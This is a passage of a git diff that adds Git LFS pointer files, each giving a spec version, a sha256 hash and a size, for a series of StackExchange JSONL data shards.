/dev/null +++ b/data/stackexchange/1-1/810_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:485ed01b05d0eb562e02f8c6f6023d8bb446727413fdf16529b080de86f89e6e +size 35029122 diff --git a/data/stackexchange/1-1/811_2289.jsonl b/data/stackexchange/1-1/811_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bfdef3cec1b1f5ea9854b1e4ccbf04123d303db3 --- /dev/null +++ b/data/stackexchange/1-1/811_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2dfa67e0d0635d86b6e36153cd5f397cbec0d8e8600c96b1ce06988fa835ca4a +size 36109169 diff --git a/data/stackexchange/1-1/812_2289.jsonl b/data/stackexchange/1-1/812_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..00dd998b17a5700271c778955a381df60981daf4 --- /dev/null +++ b/data/stackexchange/1-1/812_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5c511e1b0115f2d2c15c5746725115389ef72edcb83ebf6748e300cd209bf9da +size 34633685 diff --git a/data/stackexchange/1-1/813_2289.jsonl b/data/stackexchange/1-1/813_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3a297183c9497bd5847e9dbf35b94fa9a97d7722 --- /dev/null +++ b/data/stackexchange/1-1/813_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:215c2f76467d7cc78d0bbaa2b44da11aadcd64e99ccf405a2fddf569e861d101 +size 35148712 diff --git a/data/stackexchange/1-1/814_2289.jsonl b/data/stackexchange/1-1/814_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..aa776ce00c7e2e5c4b264f35f150f1f83b11d968 --- /dev/null +++ b/data/stackexchange/1-1/814_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:56e16323590c82a682013d3efbc335c6911cf209fe1098aafac124367e1b59e7 +size 35458502 diff --git a/data/stackexchange/1-1/815_2289.jsonl b/data/stackexchange/1-1/815_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2da765648add26c5c0628c5cf744932c6bc308bb --- /dev/null +++ b/data/stackexchange/1-1/815_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:67708211aea6dbfbcee6cbd19d81831431af4ae2d6828d928977858150f6f5ab +size 34998876 diff --git a/data/stackexchange/1-1/816_2289.jsonl b/data/stackexchange/1-1/816_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2f661823d310044a95370f13fd345339f90d6fd6 --- /dev/null +++ b/data/stackexchange/1-1/816_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d97cdaf9c2697432c64112a4964627fead4f58c89d0a2ea25d9dded12342fe9a +size 34916028 diff --git a/data/stackexchange/1-1/817_2289.jsonl b/data/stackexchange/1-1/817_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..127e9ec0c2e57ef1259e5aa4f62d726b8f96a303 --- /dev/null +++ b/data/stackexchange/1-1/817_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e4351ada95532cd0def32301b7e565078681e294f9580e5305ef378b5ef0b374 +size 35025139 diff --git a/data/stackexchange/1-1/818_2289.jsonl b/data/stackexchange/1-1/818_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2799ccbbe4e14c87de3f96afb87b36fcb6476cb5 --- /dev/null +++ b/data/stackexchange/1-1/818_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7e725f342e196a2b1431d0dbeb6845728b640777bad6e667ffd993073ff90db2 +size 35019498 diff --git a/data/stackexchange/1-1/819_2289.jsonl b/data/stackexchange/1-1/819_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..58a29bca44d44aa3901e884b27c07c62c10ee8db --- /dev/null +++ b/data/stackexchange/1-1/819_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:427d75e680f60ede3306663ceaf7cd5b987e91cb9483dad6daafe4421daf5bc2 +size 35621233 diff --git a/data/stackexchange/1-1/81_2289.jsonl b/data/stackexchange/1-1/81_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2e4996c12f628ed92ca47a199adce6d4a6b1d8ca --- /dev/null +++ b/data/stackexchange/1-1/81_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1a7ade7e05950c1a5559c0b780da010bd1a52cb8b64e11cb7eea0f8307051330 +size 39884274 diff --git a/data/stackexchange/1-1/820_2289.jsonl b/data/stackexchange/1-1/820_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6317b5bd1a596ca34b8372adc9372831bfedac11 --- /dev/null +++ b/data/stackexchange/1-1/820_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6fe6cb12d6ee214a34d21652a527a2cfbf6c00a86f846f1553cb3e4becff30f3 +size 34798521 diff --git a/data/stackexchange/1-1/821_2289.jsonl b/data/stackexchange/1-1/821_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9631e04c05abe5a26ed90adc832dc7a103845590 --- /dev/null +++ b/data/stackexchange/1-1/821_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:52f941e6755d59de2b18a46bbb8ed4c5644f108d26b3c7119b9a4050779004a0 +size 35396635 diff --git a/data/stackexchange/1-1/822_2289.jsonl b/data/stackexchange/1-1/822_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..311f90b5a0acadcf4f9cdc888b0c63b6b7bb0773 --- /dev/null +++ b/data/stackexchange/1-1/822_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a614e42d8be97920706537beb1ec63215d82c16918e7a543001d27721fe76dc5 +size 34836287 diff --git a/data/stackexchange/1-1/823_2289.jsonl b/data/stackexchange/1-1/823_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..62d0b6c10fd1f9493e233823d1e5533a26d2c0bd --- /dev/null +++ b/data/stackexchange/1-1/823_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:707ce882d2014f1f8b1264427210507ac082b1978d6d0e4f83416605123bd980 +size 34864547 diff --git a/data/stackexchange/1-1/824_2289.jsonl b/data/stackexchange/1-1/824_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8c97520c1a81c4346e454b582846f6f08d4d3934 --- /dev/null +++ b/data/stackexchange/1-1/824_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a49015c5a4266eaf6eca21c180f18dafea657c2537436420d364cadcb4a844ba +size 35452670 diff --git a/data/stackexchange/1-1/825_2289.jsonl b/data/stackexchange/1-1/825_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..970651cafbfaddbe1a9d141e4f08f565f8144fc3 --- /dev/null +++ b/data/stackexchange/1-1/825_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c067d283f0cc30c66a510ec7489e84a1d864701c4fcb527f5159dfaaf1002fd3 +size 34855803 diff --git a/data/stackexchange/1-1/826_2289.jsonl b/data/stackexchange/1-1/826_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..179ae2e11f5140efdf62fdf8e11055d2f64cf7a2 --- /dev/null +++ b/data/stackexchange/1-1/826_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c95a0b9657b28de4a2312f8ece46e317b0760c86b3125ab72c1af904117ce426 +size 35550560 diff --git a/data/stackexchange/1-1/827_2289.jsonl b/data/stackexchange/1-1/827_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4e88f876dca1e71beeeb1ccaa8de88e71f030373 --- /dev/null +++ b/data/stackexchange/1-1/827_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3c691aa9f1158a0b74571c565a8dc3fe9fedc794a3b0f3bde87cb149141b441c +size 35344992 diff --git a/data/stackexchange/1-1/828_2289.jsonl b/data/stackexchange/1-1/828_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3437fda54b3b4df831bad4d330288c467a86f451 --- /dev/null +++ b/data/stackexchange/1-1/828_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6cbe19396514459db4a12a21b63327325026bc1835080cfaf501d9067ce50b84 +size 35099253 diff --git a/data/stackexchange/1-1/829_2289.jsonl b/data/stackexchange/1-1/829_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9492747bbb2741f62a79c451501398bad48d84b4 --- /dev/null +++ b/data/stackexchange/1-1/829_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:feadfd96255882df6194f24a6adf903c52ab8c80b4cf7d0812a8a21d7fa6a755 +size 35252806 diff --git a/data/stackexchange/1-1/82_2289.jsonl b/data/stackexchange/1-1/82_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..9849b82366c38a6cd67104a062b327657d4bbcfa --- /dev/null +++ b/data/stackexchange/1-1/82_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:469d8844471b3ee5ba24513c7063fe16ff2713a2b1909057e886d3f34ebd710c +size 39421746 diff --git a/data/stackexchange/1-1/830_2289.jsonl b/data/stackexchange/1-1/830_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9dca0f3f1190fd7712bfcffb576c9761db51657a --- /dev/null +++ b/data/stackexchange/1-1/830_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:210241706b2a4c6815cedd4a98f9f387236273bb5d33898125540420f7accb39 +size 34856021 diff --git a/data/stackexchange/1-1/831_2289.jsonl b/data/stackexchange/1-1/831_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..93388158398e2fa234fc7426120d91ac41a4a32f --- /dev/null +++ b/data/stackexchange/1-1/831_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ab0fb029490183721f2daa659b24105e960b8d8f7189462d9a457a92bca34779 +size 35355304 diff --git a/data/stackexchange/1-1/832_2289.jsonl b/data/stackexchange/1-1/832_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8c41c19c6cfbe56d596a80bc3869a032b9f864ce --- /dev/null +++ b/data/stackexchange/1-1/832_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:585129aa56d50ed7369dea6e50a338277fb997070d364fdb4f34da9b011b875b +size 35018342 diff --git a/data/stackexchange/1-1/833_2289.jsonl b/data/stackexchange/1-1/833_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a017dbe5a69601455caf0d2eb0c9d2a49ff116f0 --- /dev/null +++ b/data/stackexchange/1-1/833_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fee8403e14e16e62ce30c605b02dff041ed09b24419de01e67481a0d3ad2249a +size 34696945 diff --git a/data/stackexchange/1-1/834_2289.jsonl b/data/stackexchange/1-1/834_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f710da2dc1637a63291099ea07bbfcf0275b3b04 --- /dev/null +++ b/data/stackexchange/1-1/834_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf5b4f608ffb871bd53a01f411e473404e0e871bd48959337f107ab228ee562a +size 35697702 diff --git a/data/stackexchange/1-1/835_2289.jsonl b/data/stackexchange/1-1/835_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c4cdd71c428eface81e44150fb20b73bffae0172 --- /dev/null +++ b/data/stackexchange/1-1/835_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5963aa8e0c0250745eeac56a137d9ecfabc144b17040bbc0fd20cd1d60d32893 +size 34545576 diff --git a/data/stackexchange/1-1/836_2289.jsonl b/data/stackexchange/1-1/836_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..502935cb59af044c6b9f87cd9925dd12673acd07 --- /dev/null +++ b/data/stackexchange/1-1/836_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:554480853f9d1d309919369be2e28a4d73f9929f695ed307cbca1f43acc71a14 +size 35303353 diff --git a/data/stackexchange/1-1/837_2289.jsonl b/data/stackexchange/1-1/837_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0e2a83c22ad2f327e61f420944ea1709d9df2752 --- /dev/null +++ b/data/stackexchange/1-1/837_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:d9e6fb45a3356b27997db20b579ba61a388cbe0b471f8f3588103680239d9c10 +size 35488665 diff --git a/data/stackexchange/1-1/838_2289.jsonl b/data/stackexchange/1-1/838_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b25d53791e5fd00577b8f37f935eb550f1aca422 --- /dev/null +++ b/data/stackexchange/1-1/838_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f6366c27a4c8c42b1e5c5ee824e9b2517286c049f5ddfd072dfdc283720b42c4 +size 34864072 diff --git a/data/stackexchange/1-1/839_2289.jsonl b/data/stackexchange/1-1/839_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..108341eb88da44d6c0ba7079dfc06e460ecc6317 --- /dev/null +++ b/data/stackexchange/1-1/839_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dc16785657bef99d7f0a9856ba3bdc562dbdfd6c3da5438dd89df2f6c22dc5e2 +size 35183945 diff --git a/data/stackexchange/1-1/83_2289.jsonl b/data/stackexchange/1-1/83_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..330f09f953b861376508e934d5f76306edfac45c --- /dev/null +++ b/data/stackexchange/1-1/83_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:057550864f14ca3032ef8473f13d3869381e5f573b600d038f7e8882ed1ac081 +size 39728615 diff --git a/data/stackexchange/1-1/840_2289.jsonl b/data/stackexchange/1-1/840_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b81fb791ea073eebde971cb5c242e73dfee9be7d --- /dev/null +++ b/data/stackexchange/1-1/840_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9c6eeb2caafc22b4898600d26762cba607f033c4d1d4f7a258e4a129d309fffa +size 35300503 diff --git a/data/stackexchange/1-1/841_2289.jsonl b/data/stackexchange/1-1/841_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..458ac9b74f8cdff428094039fc4d06c14299c8fb --- /dev/null +++ b/data/stackexchange/1-1/841_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:621f29f9831aab87179756be4c6d4f18bea2e40bc81c7c973f601e89220d3d10 +size 34836507 diff --git a/data/stackexchange/1-1/842_2289.jsonl b/data/stackexchange/1-1/842_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b952a63b73506fe5269d223db97c09256f008011 --- /dev/null +++ b/data/stackexchange/1-1/842_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c285cc4adc4a703b05102c6a0cedfaefe8951aab1b1615bfd002a538c66a2623 +size 34665997 diff --git a/data/stackexchange/1-1/843_2289.jsonl b/data/stackexchange/1-1/843_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7c66b1899175ef2a3b407b017aef5000ab414f41 --- /dev/null +++ b/data/stackexchange/1-1/843_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e5fb1cbe0b909be77413f567c282acfa51c5c105b31503acf356ce19c8803f8a +size 34969602 diff --git a/data/stackexchange/1-1/844_2289.jsonl b/data/stackexchange/1-1/844_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..63df13f4de41b9016d0d535598e09337c402e4da --- /dev/null +++ b/data/stackexchange/1-1/844_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aee7a8c01303445a9f23583a4434a20758203e21902dc1f7d3aebbb440e3bb2f +size 35299113 diff --git a/data/stackexchange/1-1/845_2289.jsonl b/data/stackexchange/1-1/845_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..f1bf788913357af5a209a5eb9d08f2976cc2dc0a --- /dev/null +++ b/data/stackexchange/1-1/845_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fb4c5aaaed4a02d900976891ccaa2534d7f675da5843fa36f72bdc5257c7902e +size 34989875 diff --git a/data/stackexchange/1-1/846_2289.jsonl b/data/stackexchange/1-1/846_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7aac6eb51802b036e34309462ce4924f4cdc6b6a --- /dev/null +++ b/data/stackexchange/1-1/846_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5064c8ffc169d9030b7044ff1cb12ce3f279775442b74f1bcf7bb6f93fde27eb +size 34871873 diff --git a/data/stackexchange/1-1/847_2289.jsonl b/data/stackexchange/1-1/847_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..93b78a1844a34da77c78dd16ff4e0c67650ab65b --- /dev/null +++ b/data/stackexchange/1-1/847_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6c9fdef1c5c04d9a334eec36179a1a42951bf05c6213605aa88deb1a485b373b +size 35260472 diff --git a/data/stackexchange/1-1/848_2289.jsonl b/data/stackexchange/1-1/848_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2d197a8f584aecb140474122f93196d1087b077b --- /dev/null +++ b/data/stackexchange/1-1/848_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f04b08d7f5831601b363670dd11a7d8aeef03328ccdd0a4eed45595e0ce1f9f5 +size 35100030 diff --git a/data/stackexchange/1-1/849_2289.jsonl b/data/stackexchange/1-1/849_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c6513258d6f5d23af7a0dca9e935e842a30e102e --- /dev/null +++ b/data/stackexchange/1-1/849_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1602fb8c52e79c45ad0c778800b2b7d2afc1bdf0b5ee5a6ebc55a64b848e2c78 +size 35164189 diff --git a/data/stackexchange/1-1/84_2289.jsonl b/data/stackexchange/1-1/84_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e8977a612ff9d31621cab2ffbef406c93782d6f2 --- /dev/null +++ b/data/stackexchange/1-1/84_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d61ca1128b2b35c504c5ae28544a7180692495473ea0da01b8e39707a1ea4f67 +size 39506827 diff --git a/data/stackexchange/1-1/850_2289.jsonl b/data/stackexchange/1-1/850_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b40c1a1e1102c0ad35ac40b3b9e65c26aff1cc1e --- /dev/null +++ b/data/stackexchange/1-1/850_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7ed37d3f9b7e6c32459233942729626b83dcb1089bfecc021dcdf74702129f3c +size 43785185 diff --git a/data/stackexchange/1-1/851_2289.jsonl b/data/stackexchange/1-1/851_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3434555304fc7ed47e3c21882480a462ebfca6d5 --- /dev/null +++ b/data/stackexchange/1-1/851_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:683a2e11cdff1893273f3cf4b408706d3bc6468d20571a7f01bfc6263a805707 +size 43289224 diff --git a/data/stackexchange/1-1/852_2289.jsonl b/data/stackexchange/1-1/852_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2e8fb9405ca2375a9bb28d86b0338d3eb33b2192 --- /dev/null +++ b/data/stackexchange/1-1/852_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:4d2dcbbfdbd5e2db9572b6e2473b539309891bd1c2efeab9f5d5a7af32e82ea5 +size 42601245 diff --git a/data/stackexchange/1-1/853_2289.jsonl b/data/stackexchange/1-1/853_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7bec596bb3c9520b3e38fd9d855faaa80a7334e1 --- /dev/null +++ b/data/stackexchange/1-1/853_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6b078d5fd7e89b6c017281edce5d29f1a086d1305ef78aee92ccb37945f0923f +size 43904989 diff --git a/data/stackexchange/1-1/854_2289.jsonl b/data/stackexchange/1-1/854_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..92a82dcae32863f0278b1e7e4f063b767436b781 --- /dev/null +++ b/data/stackexchange/1-1/854_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:214f3f91f0ecaa4cf4733837b05fa41a4fd403986a22c48786f77608fc3e3a89 +size 43535610 diff --git a/data/stackexchange/1-1/855_2289.jsonl b/data/stackexchange/1-1/855_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9a768e5be57edd3263945d96d76597f9df2bb9ba --- /dev/null +++ b/data/stackexchange/1-1/855_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9178598473969be5cc8c46730ae6d692faa5d7b9630239b0313b857b34409e4b +size 43207603 diff --git a/data/stackexchange/1-1/856_2289.jsonl b/data/stackexchange/1-1/856_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8d1c6d9a19af981d4842114710dee446b4e016a4 --- /dev/null +++ b/data/stackexchange/1-1/856_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:74bc8a16e99bf1568b3da2482bfdb1bfaddef0423b1e0a834ad3371d53461ba1 +size 43872659 diff --git a/data/stackexchange/1-1/857_2289.jsonl b/data/stackexchange/1-1/857_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b55c2eaf96e5c130bd0f363d69be045762d21367 --- /dev/null +++ b/data/stackexchange/1-1/857_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ff7614f169701deda457e3c6c0d85f51bfea0a5a595768b36077ba28d8341c34 +size 44118566 diff --git a/data/stackexchange/1-1/858_2289.jsonl b/data/stackexchange/1-1/858_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c437879901abc36aa4c6f9d07bf1a4df8810df7e --- /dev/null +++ b/data/stackexchange/1-1/858_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:343e4dbd04472fa3a671246bc0a83d22c725047f77835339d0d9c7e1df342e76 +size 43577525 diff --git a/data/stackexchange/1-1/859_2289.jsonl b/data/stackexchange/1-1/859_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..983d756107e122e0ccca44a98803c43e1013e9b9 --- /dev/null +++ b/data/stackexchange/1-1/859_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7ca294a56f96d3938b1830c8dfcdf03818e3b62fd4332a3594fbbb91610b7ca6 +size 42983559 diff --git a/data/stackexchange/1-1/85_2289.jsonl b/data/stackexchange/1-1/85_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6b61c797753afabb5ba23a924ad224377a2410c7 --- /dev/null +++ b/data/stackexchange/1-1/85_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:72fbc91f4ef40799283619555c3635d5371168dc96c0ec3b7a80851dc4bc9048 +size 39626974 diff --git a/data/stackexchange/1-1/860_2289.jsonl b/data/stackexchange/1-1/860_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..e114bf2907b8557332901467db0ec5bc2b98e8d8 --- /dev/null +++ b/data/stackexchange/1-1/860_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1ef5bdcc2e11e4e874a551c1492126f568d664b376319bcc7052992074fdc477 +size 42495286 diff --git a/data/stackexchange/1-1/861_2289.jsonl b/data/stackexchange/1-1/861_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c4899e1e5872b706668f63e57867a3a45262a681 --- /dev/null +++ b/data/stackexchange/1-1/861_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:64315442105aa29794a176756ffe9f7b99cb70fbe079a86e1931382858aac1c8 +size 43420367 diff --git a/data/stackexchange/1-1/862_2289.jsonl b/data/stackexchange/1-1/862_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..890f3a6ea75e5e1549cf9f7a9682c7fa173cdcf6 --- /dev/null +++ b/data/stackexchange/1-1/862_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:352428c3e528f42013f14d6bcd021733ebf567ba53b2253bb8f7e96983240786 +size 43635904 diff --git a/data/stackexchange/1-1/863_2289.jsonl b/data/stackexchange/1-1/863_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3298a16508584917860b652c0da48b929d1b288a --- /dev/null +++ b/data/stackexchange/1-1/863_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:433cc6bd5898e4d147e6392444b0053476b506e74e3bcfd4e91dd9189bc4506e +size 42705026 diff --git a/data/stackexchange/1-1/864_2289.jsonl b/data/stackexchange/1-1/864_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c01b89287396106a03034a59d2e024b8ae43dcd0 --- /dev/null +++ b/data/stackexchange/1-1/864_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ac5abfc12d18ff3b8188045cfb6554d57f07c34ff1a02894c86f6179398cf313 +size 43289954 diff --git a/data/stackexchange/1-1/865_2289.jsonl b/data/stackexchange/1-1/865_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..59a04c94326bc2df871ddc9aba40c42e073723ea --- /dev/null +++ b/data/stackexchange/1-1/865_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:795f00f73adc0a1c006ff852a6c71a6fc4aceeed2e6b09935b315862e002587e +size 43723177 diff --git a/data/stackexchange/1-1/866_2289.jsonl b/data/stackexchange/1-1/866_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e3fbafb3fde277299a4de62216d0c1bb6c7d1c59 --- /dev/null +++ b/data/stackexchange/1-1/866_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:46ca668ab0765aae36787cc794e40792d37923c0320ba1aefd15eb04e1b86988 +size 42873542 diff --git a/data/stackexchange/1-1/867_2289.jsonl b/data/stackexchange/1-1/867_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..60ecc5c6260cf3e81832abadca3566b4874c7163 --- /dev/null +++ b/data/stackexchange/1-1/867_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:47f4382a5d69861b77120746bd004a3934bfe99ee924f11223941c98073c49d0 +size 43773926 diff --git a/data/stackexchange/1-1/868_2289.jsonl b/data/stackexchange/1-1/868_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7c3f2eada0c57e8fe1941dc23b4d93fe9182ac6e --- /dev/null +++ b/data/stackexchange/1-1/868_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:813095b8ff0c332f32b31172d94969bd179c61922023fa21fa7d190d61f1ef26 +size 43532472 diff --git a/data/stackexchange/1-1/869_2289.jsonl b/data/stackexchange/1-1/869_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dd4c56c62c2ffc808d4c80ae197aac496c9eca65 --- /dev/null +++ b/data/stackexchange/1-1/869_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:72c18d7f960743336bdf112fc7153d106ee728d64349ba6e76a762513699f4f6 +size 43066170 diff --git a/data/stackexchange/1-1/86_2289.jsonl b/data/stackexchange/1-1/86_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ab44ef64d7dba5cf22873e7a1edc1015aa7d88bc --- /dev/null +++ b/data/stackexchange/1-1/86_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8e5c262b4b851149f8323c4858d116dc344f6b30780f59262a42bc9ce1ce0e63 +size 39606815 diff --git a/data/stackexchange/1-1/870_2289.jsonl b/data/stackexchange/1-1/870_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..428bfef340afc0d2bb37284773af55cf5b84feac --- /dev/null +++ b/data/stackexchange/1-1/870_2289.jsonl @@ -0,0 +1,3 @@ 